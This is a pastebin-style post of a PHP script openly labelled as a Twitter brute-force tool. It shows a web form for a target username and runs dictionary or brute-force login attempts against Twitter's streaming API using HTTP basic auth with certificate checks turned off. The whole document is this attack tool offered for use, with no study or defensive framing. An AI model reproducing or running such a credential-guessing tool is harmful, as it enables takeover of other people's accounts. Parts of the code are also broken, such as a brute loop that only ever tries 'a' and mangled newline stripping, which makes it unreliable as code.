[PHP] Twitter Brute Force


SUBMITTED BY: Guest

DATE: Nov. 9, 2013, 3:33 p.m.

FORMAT: Text only

SIZE: 6.8 kB

HITS: 925

  1. <?php
  2. /////////////////////////////////////////////////////
  3. ////Twitter Brute Force By Mauritania Attacker//////
  4. ///////////////////////////////////////////////////
  5. ///////////////////////////////////////////////////
  6. ////Changing Description won't make you the Coder/
  7. /////////////////////////////////////////////////
  8. ////////////////////////////////////////////////////////////////////////////
  9. # This script was created to Brute Force Twitter Logins,#
  10. #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
  11. ///////////////////////////////////////////////////////////////////////////
  12. $dic ="pass.txt";
  13. //////////////////////////////////////////////////////////////////////////
  14. echo "
  15. <title>Twitter Brute Force By Mauritania Attacker</title>
  16. </head>
  17. <style type='text/css'>
  18. body {
  19. font:Verdana, Arial, Helvetica, sans-serif;
  20. font-size:12px;
  21. border-color:#FFFFFF;
  22. }
  23. .raster_table {
  24. background-color:BLUE;
  25. border-color:#CCCCCC;
  26. }
  27. .alert {
  28. color:#FF0000;
  29. }
  30. </style>
  31. <body>
  32. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  33. <tr>
  34. <td>
  35. <div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
  36. </td>
  37. </tr>
  38. </table>
  39. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  40. <tr>
  41. <td>
  42. <div align='center'>
  43. </div>
  44. </td>
  45. </tr>
  46. <tr>
  47. <td>
  48. <div align='center'>
  49. </div>
  50. </td>
  51. </tr>
  52. <tr>
  53. <td>
  54. <div align='center'>
  55. <form method='post'>
  56. Target User:<br>
  57. <input name='username' type='text' /><br><br>
  58. <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
  59. </form>
  60. </div>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>
  65. <div align='center'>
  66. </div>
  67. </td>
  68. </tr>
  69. </table>
  70. ";
  71. // Sets variables and retrives twitter error for comparing
  72. if(isset($_POST['attack']) && isset($_POST['username'])) {
  73. $username = $_POST['username'];
  74. $headers = array(
  75. "Host: stream.twitter.com",
  76. "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
  77. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  78. "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
  79. "Accept-Encoding: text", # No gzip, it only clutters your code!
  80. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
  81. "Date: ".date(DATE_RFC822)
  82. );
  83. $c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
  84. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
  85. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  86. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
  87. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
  88. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  89. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
  90. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
  91. $wrong = curl_exec($c); // Get it
  92. curl_close($c); // Close the curl stream
  93. }
  94. //Dictionary Attack
  95. if($_POST['attack'] == "dictionary") {
  96. $Dictionary = file("$dic");
  97. for ($Position = 0; $Position < count($Dictionary); $Position++) {
  98. $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
  99. if(check_correct($username, $Dictionary[$Position])) {
  100. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  101. <tr>
  102. <td>
  103. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  104. </td>
  105. </tr>
  106. </table>
  107. </body>
  108. </html>");
  109. }
  110. }
  111. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  112. <tr>
  113. <td>
  114. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
  115. y attack.</b></div>
  116. </td>
  117. </tr>
  118. </table>";
  119. }
  120. //Brute Attack
  121. elseif($_POST['attack'] == "brute") {
  122. for ($Pass = 0; $Pass < 2; $Pass++) {
  123. if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
  124. if(check_correct($username, $Pass)) {
  125. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  126. <tr>
  127. <td>
  128. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  129. </td>
  130. </tr>
  131. </table>
  132. </body>
  133. </html>");
  134. }
  135. }
  136. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  137. <tr>
  138. <td>
  139. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
  140. ce attack.</b></div>
  141. </td>
  142. </tr>
  143. </table>";
  144. }
  145. echo "</body>
  146. </html>";
  147. // Function for checking whether the username and password are correct
  148. function check_correct($username, $password)
  149. {
  150. global $wrong, $headers;
  151. $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
  152. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
  153. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  154. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
  155. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
  156. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  157. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
  158. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
  159. $str = curl_exec($c); // Get it
  160. curl_close($c);
  161. if($str != $wrong) {return true;}
  162. else {return false;}
  163. }
  164. ?>

comments powered by Disqus